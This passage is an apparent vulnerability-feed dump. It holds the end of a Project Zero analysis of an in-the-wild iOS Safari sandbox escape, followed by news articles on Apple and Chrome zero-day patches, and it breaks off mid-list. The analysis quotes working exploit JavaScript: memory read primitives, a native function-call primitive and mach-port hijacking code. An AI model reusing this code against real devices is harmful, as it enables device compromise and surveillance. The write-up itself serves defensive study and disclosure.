15n,\n\nIOConnectCallMethod: 16n,\n\nopen: 17n,\n\nsprintf: 18n,\n\nprintf: 19n\n\n};\n\nThese match up perfectly with the first 20 symbols which the NSExpression looked up via dlsym.\n\nFor each of those symbols they define a JS wrapper, like for example this one for task_get_special_port:\n\nfunction task_get_special_port(task, which_port, special_port) {\n\nreturn fcall(all_function[\"task_get_special_port\"], task, which_port, special_port)\n\n}\n\nThey declare two ArrayBuffers, one named lock and one named func_buffer:\n\nvar lock = new Uint8Array(32);\n\nvar func_buffer = new BigUint64Array(24);\n\nThey use the read64 primitive to store the address of those buffers into two more variables, then set the first byte of the lock buffer to 1:\n\nvar lock_addr = read64(addrof(lock).add(16)).noPAC().asDouble();\n\nvar func_buffer_addr = read64(addrof(func_buffer).add(16)).noPAC().asDouble();\n\nlock[0] = 1;\n\nThey then define the fcall function which the JS wrappers use to call the native symbols:\n\nfunction\n\nfcall(func_idx,\n\nx0 = 0x34343434n, x1 = 1n, x2 = 2n, x3 = 3n,\n\nx4 = 4n, x5 = 5n, x6 = 6n, x7 = 7n,\n\nvarargs = [0x414141410000n,\n\n0x515151510000n,\n\n0x616161610000n,\n\n0x818181810000n])\n\n{\n\nif (typeof x0 !== \"bigint\") x0 = BigInt(x0.toString());\n\nif (typeof x1 !== \"bigint\") x1 = BigInt(x1.toString());\n\nif (typeof x2 !== \"bigint\") x2 = BigInt(x2.toString());\n\nif (typeof x3 !== \"bigint\") x3 = BigInt(x3.toString());\n\nif (typeof x4 !== \"bigint\") x4 = BigInt(x4.toString());\n\nif (typeof x5 !== \"bigint\") x5 = BigInt(x5.toString());\n\nif (typeof x6 !== \"bigint\") x6 = BigInt(x6.toString());\n\nif (typeof x7 !== \"bigint\") x7 = BigInt(x7.toString());\n\nlet sanitised_varargs =\n\nvarargs.map(\n\n(x =&gt; typeof x !== \"bigint\" ? BigInt(x.toString()) : x));\n\nfunc_buffer[0] = func_idx;\n\nfunc_buffer[1] = x0;\n\nfunc_buffer[2] = x1;\n\nfunc_buffer[3] = x2;\n\nfunc_buffer[4] = x3;\n\nfunc_buffer[5] = x4;\n\nfunc_buffer[6] = x5;\n\nfunc_buffer[7] = x6;\n\nfunc_buffer[8] = x7;\n\nsanitised_varargs.forEach(((x, i) =&gt; {\n\nfunc_buffer[i + 9] = x\n\n}));\n\nlock[0] = 0;\n\nlock[4] = 0;\n\nwhile (lock[4] != 1);\n\nreturn new Int64(\"0x\" + func_buffer[0].toString(16))\n\n}\n\nThis coerces each argument to a BigInt then fills the func_buffer first with the index of the function to call then each argument in turn. It clears two bytes in the lock ArrayBuffer then waits for one of them to become 1 before reading the return value, effectively implementing a spinlock.\n\nJS 2 doesn't call fcall though. We now return back to the NSExpression to analyse what must be the other side of that ArrayBuffer \"shared memory\" function call primitive.\n\n### In the background\n\nOnce JS 2 has been evaluated the NSExpression again uses the [JSContext objectForKeyedSubscript:] method to read the lock_addr and func_buffer_addr variables.\n\nIt then creates another NSInvocation but this time instead of using the double invocation trick it sets the target of the NSInvocation to an NSExpression; sets the selector to expressionValueWithObject: and the second argument to the context dictionary which contains the variables defined in the NSExpression. They then call performSelectorInBackground:sel(invoke), causing part of the serialized object to be evaluated in a different thread. It's that background code which we'll look at now:\n\n### Loopy landscapes\n\nNSExpressions aren't great for building loop primitives. We already saw that the loop to traverse the linked-list of pthreads was just unrolled 100 times. This time around they want to create an infinite loop, which can't just be unrolled! Instead they use the following construct:\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl5e89bmNK8v8WM2cl1eMnnyfNhq-TYvPsWCPIjpLsaWckLRv_SC288D5g0_pJCuhfAlkAiiYUdr8xnUgr1StYkDy2UjkDPVhFgsYaNvVI4BawF6aSnNCqNIYHXOKMv98NlyYZ0iXOSnR9MINhZwl34wg7qWJuHoRLPtVh59Ggr6k3ehTsdhyLd81TeFQ/s608/image12.png>)\n\nThey build a tree where each sub-level is evaluated twice by having two arguments which both point to the same expression. Right at the bottom of this tree we find the actual loop body. There are 33 of these doubling-nodes meaning the loop body will be evaluated 2^33 times, effectively a while(1) loop.\n\nLet's look at the body of this loop:\n\n[v_OSSpinLockLockInvocationInstance\n\nsetTarget:[v_functions_listener_lock longLongValue] ];\n\n[v_OSSpinLockLockInvocationInstance\n\nsetSelector:[@0x43434343 longLongValue] ];\n\n[v_OSSpinLockLockInvocationInstanceIMP\n\nsetTarget:v_OSSpinLockLockInvocationInstance ];\n\n[v_OSSpinLockLockInvocationInstanceIMP invoke];\n\nv_functions_listener_lock is the address of the backing buffer of the ArrayBuffer containing the \"spinlock\" which the JS unlock after writing all the function call parameters into the func_buffer ArrayBuffer. This calls OSSpinLockLock to lock that lock.\n\nThe NSExpression reads the function index from the func_buffer ArrayBuffer backing buffer then reads 19 argument slots, writing each 64-bit value into the corresponding slot (target, selector, arguments) of an NSInvocation. They then convert the function index into a string and call valueForKey on the context dictionary which stores all the NSExpression variables to find the variable with the provided numeric string name (recall that they defined a variable called '0' storing a PACIZA'ed pointer to \"syscall\".)\n\nThey use the double invocation trick to call the target function then extract the return value from the NSInvocation and write it into the func_buffer:\n\n[v_serializedInvName getReturnValue:[set_msb(v_functions_listener_buffer) longLongValue] ];\n\nFinally, the loop body ends with an arbitrary write to unlock the spinlock, allowing the JS which was spinning to continue and read the function call result from the ArrayBuffer.\n\nThen back in the main NSExpression thread it evaluates one final piece of JS in the same JSContext:\n\n### JS3\n\nUnlike JS1 and 2 and the NSExpression, JS 3 is stripped and partially obfuscated, though with some analysis most of the names can be recovered. For example, the script starts by defining a number of constants - these in fact come from a number of system headers and the values appear in exactly the same order as the system headers:\n\nconst z = 16;\n\nconst u = 17;\n\nconst m = 18;\n\nconst x = 19;\n\nconst f = 20;\n\nconst v = 21;\n\nconst b = 22;\n\nconst p = 24;\n\nconst l = 25;\n\nconst w = 26;\n\nconst y = 0;\n\nconst B = 1;\n\nconst I = 2;\n\nconst F = 3;\n\nconst U = 4;\n\nconst k = 2147483648;\n\nconst C = 1;\n\nconst N = 2;\n\nconst S = 4;\n\nconst T = 0x200000000n;\n\n| \n\nconst MACH_MSG_TYPE_MOVE_RECEIVE = 16;\n\nconst MACH_MSG_TYPE_MOVE_SEND = 17;\n\nconst MACH_MSG_TYPE_MOVE_SEND_ONCE = 18;\n\nconst MACH_MSG_TYPE_COPY_SEND = 19;\n\nconst MACH_MSG_TYPE_MAKE_SEND = 20;\n\nconst MACH_MSG_TYPE_MAKE_SEND_ONCE = 21;\n\nconst MACH_MSG_TYPE_COPY_RECEIVE = 22;\n\nconst MACH_MSG_TYPE_DISPOSE_RECEIVE = 24;\n\nconst MACH_MSG_TYPE_DISPOSE_SEND = 25;\n\nconst MACH_MSG_TYPE_DISPOSE_SEND_ONCE = 26;\n\nconst MACH_MSG_PORT_DESCRIPTOR = 0;\n\nconst MACH_MSG_OOL_DESCRIPTOR = 1;\n\nconst MACH_MSG_OOL_PORTS_DESCRIPTOR = 2;\n\nconst MACH_MSG_OOL_VOLATILE_DESCRIPTOR = 3;\n\nconst MACH_MSG_GUARDED_PORT_DESCRIPTOR = 4;\n\nconst MACH_MSGH_BITS_COMPLEX = 0x80000000;\n\nconst MACH_SEND_MSG = 1;\n\nconst MACH_RCV_MSG = 2;\n\nconst MACH_RCV_LARGE = 4;\n\nconst MACH64_SEND_KOBJECT_CALL = 0x200000000n; \n \n---|--- \n \nThe code begins by using a number of symbols passed in from the outer RCE js to find the HashMap storing the mach ports implementing the WebContent to GPU Process IPC:\n\n//WebKit::GPUProcess::GPUProcess\n\nvar WebKit::GPUProcess::GPUProcess =\n\nnew Int64(\"0x0a1a0a1a0a2a0a2a\");\n\n// offset of m_webProcessConnections HashMap in GPUProcess\n\nvar offset_of_m_webProcessConnections =\n\nnew Int64(\"0x0a1a0a1a0a2a0a2b\"); // 136\n\n// offset of IPC::Connection m_connection in GPUConnectionToWebProcess\n\nvar offset_of_m_connection_in_GPUConnectionToWebProcess =\n\nnew Int64(\"0x0a1a0a1a0a2a0a2c\"); // 48\n\n// offset of m_sendPort\n\nvar offset_of_m_sendPort_in_IPC_Connection = new Int64(\"0x0a1a0a1a0a2a0a2d\"); // 280 \n\n// find the m_webProcessConnections HashMap:\n\nvar m_webProcessConnections = \n\nread64( WebKit::GPUProcess::GPUProcess.add(\n\noffset_of_m_webProcessConnections)).noPAC();\n\nThey iterate through all the entries in that HashMap to collect all the mach ports representing all the GPU Process to WebContent IPC connections:\n\nvar entries_cnt = read64(m_webProcessConnections.sub(8)).hi().asInt32();\n\nvar GPU_to_WebProcess_send_ports = [];\n\nfor (var he = 0; he &lt; entries_cnt; he++) {\n\nvar hash_map_key = read64(m_webProcessConnections.add(he * 16));\n\nif (hash_map_key.is0() ||\n\nhash_map_key.equals(const_int64_minus_1))\n\n{\n\ncontinue\n\n}\n\nvar GPUConnectionToWebProcess = \n\nread64(m_webProcessConnections.add(he * 16 + 8));\n\nif (GPUConnectionToWebProcess.is0()) {\n\ncontinue\n\n}\n\nvar m_connection = \n\nread64(\n\nGPUConnectionToWebProcess.add(\n\noffset_of_m_connection_in_GPUConnectionToWebProcess));\n\nvar m_sendPort =\n\nBigInt(read64(\n\nm_connection.add(\n\noffset_of_m_sendPort_in_IPC_Connection)).lo().asInt32());\n\nGPU_to_WebProcess_send_ports.push(m_sendPort)\n\n}\n\nThey allocate a new mach port then iterate through each of the GPU Process to WebContent connection ports, sending each one a mach message with a port descriptor containing a send right to the newly allocated port:\n\nfor (let WebProcess_send_port of GPU_to_WebProcess_send_ports) {\n\nfor (let _ = 0; _ &lt; d; _++) {\n\n// memset the message to 0\n\nfor (let e = 0; e &lt; msg.byteLength; e++) {\n\nmsg.setUint8(e, 0)\n\n}\n\n// complex message\n\nhello_msg.header.msgh_bits.set(\n\nmsg, MACH_MSG_TYPE_COPY_SEND | MACH_MSGH_BITS_COMPLEX, 0);\n\n// send to the web process\n\nhello_msg.header.msgh_remote_port.set(\n\nmsg, WebProcess_send_port, 0);\n\nhello_msg.header.msgh_size.set(msg, hello_msg.__size, 0);\n\n// one descriptor\n\nhello_msg.body.msgh_descriptor_count.set(\n\nmsg, 1, hello_msg.header.__size);\n\n// send a right to the comm port:\n\nhello_msg.communication_port.name.set(\n\nmsg, comm_port_receive_right,\n\nhello_msg.header.__size + hello_msg.body.__size);\n\n// give other side a send right\n\nhello_msg.communication_port.disposition.set(\n\nmsg, MACH_MSG_TYPE_MAKE_SEND, \n\nhello_msg_buffer.header.__size + hello_msg.body.__size);\n\nhello_msg.communication_port.type.set(\n\nmsg, MACH_MSG_PORT_DESCRIPTOR,\n\nhello_msg.header.__size + hello_msg.body.__size);\n\nmsg.setBigUint64(hello_msg.data.offset, BigInt(_), true);\n\n// send the request\n\nkr = mach_msg_send(u8array_backing_ptr(msg));\n\nif (kr != KERN_SUCCESS) {\n\ncontinue\n\n}\n\n}\n\nNote that, apart from having to use ArrayBuffers instead of pointers, this looks almost like it would if it was written in C and executing truly arbitrary native code. But as we've seen, there's a huge amount of complexity hidden behind that simple call to mach_msg_send.\n\nThe JS then tries to receive a reply to the hello message, and if they do it's assumed that they have found the WebContent process which compromised the GPU process and is waiting for the GPU process exploit to succeed.\n\nIt's at this point that we finally approach the final stages of this writeup.\n\n### Last Loops\n\nHaving established a new communications channel with the native code running in the WebContent process the JS enters an infinite loop waiting to service requests:\n\nfunction handle_comms_with_compromised_web_process(comm_port) {\n\nvar kr = KERN_SUCCESS;\n\nlet request_msg = alloc_message_from_proto(req_proto);\n\nwhile (true) {\n\nfor (let e = 0; e &lt; request_msg.byteLength; e++) {\n\nrequest_msg.setUint8(e, 0)\n\n}\n\nreq_proto.header.msgh_local_port.set(request_msg, comm_port, 0);\n\nreq_proto.msgh_size.set(request_msg, req_proto.__size, 0);\n\n// get a request\n\nkr = mach_msg_receive(u8array_backing_ptr(request_msg));\n\nif (kr != KERN_SUCCESS) {\n\nreturn kr\n\n}\n\nlet msgh_id = req_proto.header.msgh_id.get(request_msg, 0);\n\nhandle_request_from_web_process(msgh_id, request_msg)\n\n}\n\n}\n\nIn the end, this entire journey culminates in the vending of 9 new js-implemented IPCs (msgh_id values 0 through 8.)\n\n### IPC 0:\n\nJust sends a reply message containing KERN_SUCCESS\n\n### IPC 1 - 4\n\nThese interact with the AppleM2ScalerCSCDriver userclient and presumably trigger the kernel bug.\n\n### IPC 5:\n\nWraps io_service_open_extended, taking a service name and connection type.\n\n### IPC 6:\n\nThis takes an address and a size and creates a VM_PROT_READ | VM_PROT_WRITE mach_memory_entry covering the requested region which it returns via a port descriptor.\n\n### IPC 7:\n\nThis IPC extracts and returns via a MOVE_SEND disposition the requested mach port name.\n\n### IPC 8:\n\nThis simply calls the exit syscall, presumably to cleanly terminate the process. If that fails, it causes a NULL pointer dereference to crash the process:\n\ncase request_id_const_8: {\n\nsyscall(1, 0);\n\nread64(new Int64(\"0x00000000\"));\n\nbreak\n\n}\n\n### Conclusion\n\nThis exploit was undoubtedly complex. Often this complexity is interpreted as a sign that the difficulty of finding and exploiting vulnerabilities is increasing. Yet the buffer overflow vulnerability at the core of this exploit was not complex - it was a well-known, simple anti-pattern in a programming language whose security weaknesses have been studied for decades. I imagine that this vulnerability was relatively easy for the attackers to discover.\n\nThe vast majority of the complexity lay in the later post-compromise stages - the glue which connected this IPC vulnerability to the next one in the chain. In my opinion, the reason the attackers invested so much time and effort in this part is that it's reusable. It is a high one-time cost which then hugely decreases the marginal cost of gluing the next IPC bug to the next kernel bug.\n\nEven in a world with NX memory, mandatory code signing, pointer authentication and a myriad of other mitigations, creative attackers are still able to build [weird machines](<https://ieeexplore.ieee.org/document/8226852>) just as powerful as native code. The age of data-only exploitation is truly here; and yet another mitigation to fix one more trick is unlikely to end that. But what does make a difference is focusing on the fundamentals: early-stage design and code reviews, broad testing and code quality. This vulnerability was introduced less than two years ago \u2014 we as an industry, at a minimum should be aiming to ensure that at least new code is vetted for well-known vulnerabilities like buffer overflows. A low bar which is clearly still not being met.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-10-13T00:00:00", "type": "googleprojectzero", "title": "\nAn analysis of an in-the-wild iOS Safari WebContent to GPU Process exploit\n", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28205", "CVE-2023-28206", "CVE-2023-32409"], "modified": "2023-10-13T00:00:00", "id": "GOOGLEPROJECTZERO:79C0B1D78EE7B7F805411C0711DA81BD", "href": "https://googleprojectzero.blogspot.com/2023/10/an-analysis-of-an-in-the-wild-ios-safari-sandbox-escape.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2023-04-11T08:22:43", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjAJGJ4utVhAUXUHyNPRlO1YZUYX4DKNhN7na-oo-T-jvPt9Vj7MTD0m3tDvLyKSEvbYf0rsotHAY8nafpRXQrB9OeLiZBoGverhucWOGVThcBs2qDUfyGW-a8Ydr8yieRqQuY19GE225em1q-U50UO71hFiZLBn8yBfUzX9UYGY48hOFp-UfUXafqO/s728-e365/apple.png>)\n\nApple on Friday released security updates for [iOS, iPadOS](<https://support.apple.com/en-us/HT213720>), [macOS](<https://support.apple.com/en-us/HT213721>), and [Safari web browser](<https://support.apple.com/en-us/HT213722>) to address a pair of zero-day flaws that are being exploited in the wild.\n\nThe two vulnerabilities are as follows -\n\n * **CVE-2023-28205** \\- A [use after free issue](<https://cwe.mitre.org/data/definitions/416.html>) in WebKit that could lead to arbitrary code execution when processing specially crafted web content.\n * **CVE-2023-28206** \\- An [out-of-bounds write issue](<https://cwe.mitre.org/data/definitions/787.html>) in IOSurfaceAccelerator that could enable an app to execute arbitrary code with kernel privileges.\n\nApple said it addressed CVE-2023-28205 with improved memory management and the second with better input validation, adding it's aware the bugs \"may have been actively exploited.\"\n\nCredited with discovering and reporting the flaws are Cl\u00e9ment Lecigne of Google's Threat Analysis Group (TAG) and Donncha \u00d3 Cearbhaill of Amnesty International's Security Lab.\n\nDetails about the two vulnerabilities have been withheld in light of active exploitation and to prevent more threat actors from abusing them.\n\nThe updates are available in version iOS 16.4.1, iPadOS 16.4.1, macOS Ventura 13.3.1, and Safari 16.4.1. The fixes also span a wide range of devices -\n\n * iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later\n * Macs running macOS Big Sur, Monterey, and Ventura\n\nApple has patched three zero-days since the start of the year. In February, Apple addressed another actively exploited zero-day ([CVE-2023-23529](<https://thehackernews.com/2023/02/patch-now-apples-ios-ipados-macos-and.html>)) in WebKit that could result in arbitrary code execution.\n\nThe development also comes as Google TAG [disclosed](<https://thehackernews.com/2023/03/spyware-vendors-caught-exploiting-zero.html>) that commercial spyware vendors are leveraging zero-days in Android and iOS to infect mobile devices with surveillance malware.\n\n## Apple Expands Patches to Older Devices\n\nApple, on April 10, 2023, backported patches for the two actively exploited flaws to include older iPhones, iPads, and Macs. The updates are available for the following devices -\n\n * [iOS 15.7.5 and iPadOS 15.7.5](<https://support.apple.com/en-us/HT213723>) \\- iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)\n * macOS [Big Sur 11.7.6](<https://support.apple.com/en-us/HT213725>) and [Monterey 12.6.5](<https://support.apple.com/en-us/HT213724>) (It's worth noting that the update only addresses CVE-2023-28206.)\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-08T05:15:00", "type": "thn", "title": "Apple Releases Updates to Address Zero-Day Flaws in iOS, iPadOS, macOS, and Safari", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2023-23529", "CVE-2023-28205", "CVE-2023-28206"], "modified": "2023-04-11T07:31:31", "id": "THN:CE48B3DDA855F117035F84E39BB0D811", "href": "https://thehackernews.com/2023/04/apple-releases-updates-to-address-zero.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-12-05T06:08:51", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEi3-1t-O1Y4Oqvj24RGfItVIc7r4d1BOuWfRH4xG5ilh6GX83VydcDH0Fs1xqW5JUvFrpLzvA9ifqmf2lHts3lgA5VStlmb7c1Msk0yFUv5qzEgEjiU3_EPqVJlK4Z6uzMUFoKmnDAHWtOXsYNv7vEG8yG9H-NwH46z-Z7nAKiihKDF7bzl_Y20QXxS/s728-e100/chrome.png>)\n\nSearch giant Google on Friday released an out-of-band security update to fix a new actively exploited zero-day flaw in its Chrome web browser.\n\nThe high-severity flaw, tracked as [CVE-2022-4262](<https://chromereleases.googleblog.com/2022/12/stable-channel-update-for-desktop.html>), concerns a type confusion bug in the V8 JavaScript engine. Clement Lecigne of Google's Threat Analysis Group (TAG) has been credited with reporting the issue on November 29, 2022.\n\nType confusion vulnerabilities could be weaponized by threat actors to perform out-of-bounds memory access, or lead to a crash and arbitrary code execution.\n\nAccording to the NIST's National Vulnerability Database, the flaw [permits](<https://nvd.nist.gov/vuln/detail/CVE-2022-4262>) a \"remote attacker to potentially exploit heap corruption via a crafted HTML page.\"\n\nGoogle acknowledged active exploitation of the vulnerability but stopped short of sharing additional specifics to prevent further abuse.\n\nCVE-2022-4262 is the fourth actively exploited type confusion flaw in Chrome that Google has addressed since the start of the year. It's also the ninth zero-day flaw attackers have exploited in the wild in 2022 -\n\n * [**CVE-2022-0609**](<https://thehackernews.com/2022/02/new-chrome-0-day-bug-under-active.html>) \\- Use-after-free in Animation\n * [**CVE-2022-1096**](<https://thehackernews.com/2022/03/google-issues-urgent-chrome-update-to.html>) \\- Type confusion in V8\n * [**CVE-2022-1364**](<https://thehackernews.com/2022/04/google-releases-urgent-chrome-update-to.html>) \\- Type confusion in V8\n * [**CVE-2022-2294**](<https://thehackernews.com/2022/07/update-google-chrome-browser-to-patch.html>) \\- Heap buffer overflow in WebRTC\n * [**CVE-2022-2856**](<https://thehackernews.com/2022/08/new-google-chrome-zero-day.html>) \\- Insufficient validation of untrusted input in Intents\n * [**CVE-2022-3075**](<https://thehackernews.com/2022/09/google-release-urgent-chrome-update-to.html>) \\- Insufficient data validation in Mojo\n * [**CVE-2022-3723**](<https://thehackernews.com/2022/10/google-issues-urgent-chrome-update-to.html>) \\- Type confusion in V8\n * [**CVE-2022-4135**](<https://thehackernews.com/2022/11/update-chrome-browser-now-to-patch-new.html>) \\- Heap buffer overflow in GPU\n\nUsers are recommended to upgrade to version 108.0.5359.94 for macOS and Linux and 108.0.5359.94/.95 for Windows to mitigate potential threats.\n\nUsers of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2022-12-03T04:41:00", "type": "thn", "title": "Google Rolls Out New Chrome Browser Update to Patch Yet Another Zero-Day Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609", "CVE-2022-1096", "CVE-2022-1364", "CVE-2022-2294", "CVE-2022-2856", "CVE-2022-3075", "CVE-2022-3723", "CVE-2022-4135", "CVE-2022-4262"], "modified": "2022-12-05T04:33:44", "id": "THN:2FB8A3C1E526D1FFA1477D35F0F70BF4", "href": "https://thehackernews.com/2022/12/google-rolls-out-new-chrome-browser.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:28", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhpjCuGD4WXaNN6nxKO5EalNHXrEO1r2PgkwQYS5Z4fg1J1iNhNuSZu4tqOM6Ohl9vpp6QyHLYCS9rWACrVbbaIJUPQ9rTXrZPXmPG7SMzGybYouS2Gy54kBSr90hQqQD0npkDgUM7qiCLvQEpG86SHqny5-bN6yTHLRxPBtls52iaOhN5Ui-sM9RZ4/s728-e100/chrome-extensions.jpg>)\n\nGoogle on Thursday shipped emergency patches to address two security issues in its Chrome web browser, one of which it says is being actively exploited in the wild.\n\nTracked as [CVE-2022-1364](<https://chromereleases.googleblog.com/2022/04/stable-channel-update-for-desktop_14.html>), the tech giant described the high-severity bug as a case of type confusion in the V8 JavaScript engine. Cl\u00e9ment Lecigne of Google's Threat Analysis Group has been credited with reporting the flaw on April 13, 2022.\n\nAs is typically the case with actively exploited zero-day flaws, the company acknowledged it's \"aware that an exploit for CVE-2022-1364 exists in the wild.\" Additional details about the flaw and the identity of the threat actors have been withheld to prevent further abuse.\n\nWith the latest fix, Google has patched a total of three zero-day vulnerabilities in Chrome since the start of the year. It's also the second type confusion-related bug in V8 to be squashed in less than a month -\n\n * [CVE-2022-0609](<https://thehackernews.com/2022/02/new-chrome-0-day-bug-under-active.html>) \\- Use-after-free in Animation\n * [CVE-2022-1096](<https://thehackernews.com/2022/03/google-issues-urgent-chrome-update-to.html>) \\- Type confusion in V8\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh6B83ZXigpC9fguwiLwmsTF6j73zc5NEtpSNiGfAAl-clSHcXVa31RbaQfOCfKesHRCqidahWfYEq_lTb6Wo-qPTz15of2-8gP75by67zdsyHfHawMXYaPWSZQLF1KIVi7jyn0uf4bWxBN0j73AHcGrmJOkXRdboYNb6jCKG2veHy3dPK8riejHmuo/s728-e100/chrome-update.jpg>)\n\nUsers are recommended to update to version 100.0.4896.127 for Windows, macOS, and Linux to thwart potential threats. Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-15T03:25:00", "type": "thn", "title": "Google Releases Urgent Chrome Update to Patch Actively Exploited Zero-Day Flaw", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609", "CVE-2022-1096", "CVE-2022-1364"], "modified": "2022-04-18T03:04:38", "id": "THN:E48AEFF468AB8445D91A32B6F5D7A770", "href": "https://thehackernews.com/2022/04/google-releases-urgent-chrome-update-to.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-28T12:06:14", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhv36XpOZ1dAQAOtoI2FJrLTIwbrZmkU8pIotJv8smSt1yHSR5Sbs9DtPNusAAMvajmGc-st695EsqO3w1aNTpm9vxASuSHCLI61DemGb3LaAMW7MDDLo4j30s4iE1DZr2UeTpkEHlUc-WwTo0zqCxLNMlSHPLCRNEDT4wpaWQjgJMl3KhUpK7MKa2Z/s728-e100/chrome-zero-day-vulnerability.jpg>)\n\nGoogle on Thursday rolled out emergency fixes to contain an actively exploited zero-day flaw in its Chrome web browser.\n\nThe [vulnerability](<https://chromereleases.googleblog.com/2022/10/stable-channel-update-for-desktop_27.html>), tracked as **CVE-2022-3723**, has been described as a type confusion flaw in the V8 JavaScript engine.\n\nSecurity researchers Jan Vojt\u011b\u0161ek, Mil\u00e1nek, and Przemek Gmerek of Avast have been credited with reporting the flaw on October 25, 2022.\n\n\"Google is aware of reports that an exploit for CVE-2022-3723 exists in the wild,\" the internet giant acknowledged in an advisory without getting into more specifics about the nature of the attacks.\n\nCVE-2022-3723 is the third actively exploited type confusion bug in V8 this year after [CVE-2022-1096](<https://thehackernews.com/2022/03/google-issues-urgent-chrome-update-to.html>) and [CVE-2022-1364](<https://thehackernews.com/2022/04/google-releases-urgent-chrome-update-to.html>).\n\nThe latest fix also marks the resolution of the seventh zero-day in Google Chrome since the start of 2022 -\n\n * [**CVE-2022-0609**](<https://thehackernews.com/2022/02/new-chrome-0-day-bug-under-active.html>) \\- Use-after-free in Animation\n * [**CVE-2022-1096**](<https://thehackernews.com/2022/03/google-issues-urgent-chrome-update-to.html>) \\- Type confusion in V8\n * 